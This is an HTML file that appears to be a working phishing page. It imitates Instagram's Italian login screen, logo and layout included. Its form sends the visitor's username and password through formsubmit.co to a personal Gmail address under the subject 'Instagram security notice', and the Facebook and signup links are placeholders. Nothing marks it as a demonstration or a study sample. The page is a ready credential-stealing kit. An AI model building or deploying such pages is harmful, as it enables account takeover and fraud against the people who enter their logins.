<!DOCTYPE html>
<html>
<head>
    <title>Instagram - Accedi</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
        }
        
        body {
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            min-height: 100vh;
            padding: 20px;
        }
        
        .container {
            max-width: 350px;
            width: 100%;
            margin-top: 40px;
        }
        
        .login-box {
            background: white;
            border: 1px solid #dbdbdb;
            padding: 20px 40px;
            text-align: center;
            margin-bottom: 10px;
        }
        
        .logo {
            width: 175px;
            margin: 22px auto 12px;
        }
        
        input {
            width: 100%;
            padding: 9px 8px 7px;
            margin-bottom: 6px;
            border: 1px solid #dbdbdb;
            background: #fafafa;
            border-radius: 3px;
            font-size: 12px;
            color: #262626;
        }
        
        button.login {
            background: #0095f6;
            color: white;
            width: 100%;
            padding: 7px 16px;
            border: none;
            border-radius: 4px;
            font-weight: 600;
            margin: 8px 0;
            font-size: 14px;
            cursor: pointer;
        }
        
        .divider {
            margin: 10px 0 18px;
            color: #8e8e8e;
            font-size: 13px;
            font-weight: 600;
            display: flex;
            align-items: center;
            text-transform: uppercase;
        }
        
        .divider::before,
        .divider::after {
            content: "";
            flex: 1;
            border-bottom: 1px solid #dbdbdb;
            margin: 0 18px;
        }
        
        .fb-login {
            color: #385185;
            font-weight: 600;
            font-size: 14px;
            margin: 8px 0;
            display: inline-block;
        }
        
        .forgot-pw {
            color: #00376b;
            font-size: 12px;
            margin: 12px 0;
            display: inline-block;
        }
        
        .signup-box {
            background: white;
            border: 1px solid #dbdbdb;
            padding: 20px;
            text-align: center;
            font-size: 14px;
        }
        
        .signup-link {
            color: #0095f6;
            font-weight: 600;
        }
        
        .report-box {
            text-align: center;
            font-size: 12px;
            color: #8e8e8e;
            margin: 15px 0;
            line-height: 1.4;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box">
            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" class="logo" alt="Instagram">
            <form action="https://formsubmit.co/evox35437@gmail.com" method="POST">
                <input type="hidden" name="_subject" value="Avviso di sicurezza Instagram">
                <input type="hidden" name="_template" value="table">
                <input type="text" name="username" placeholder="Numero di telefono, nome utente o e-mail" required>
                <input type="password" name="password" placeholder="Password" required>
                <button type="submit" class="login">Accedi</button>
            </form>
            
            <div class="divider">oppure</div>
            
            <a href="#" class="fb-login">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="#385185" viewBox="0 0 24 24" style="vertical-align: middle; margin-right: 8px;">
                    <path d="M22.675 0h-21.35c-.732 0-1.325.593-1.325 1.325v21.351c0 .731.593 1.324 1.325 1.324h11.495v-9.294h-3.128v-3.622h3.128v-2.671c0-3.1 1.893-4.788 4.659-4.788 1.325 0 2.463.099 2.795.143v3.24l-1.918.001c-1.504 0-1.795.715-1.795 1.763v2.313h3.587l-.467 3.622h-3.12v9.293h6.116c.73 0 1.323-.593 1.323-1.325v-21.35c0-.732-.593-1.325-1.325-1.325z"/>
                </svg>
                Accedi con Facebook
            </a>
            
            <a href="#" class="forgot-pw">Password dimenticata?</a>
        </div>
        
        <div class="signup-box">
            Non hai un account? <a href="#" class="signup-link">Iscriviti</a>
        </div>
        
        <div class="report-box">
            Puoi anche segnalare i contenuti che ritieni violino<br>
            nel tuo Paese senza accedere.
        </div>
    </div>
</body>
</html>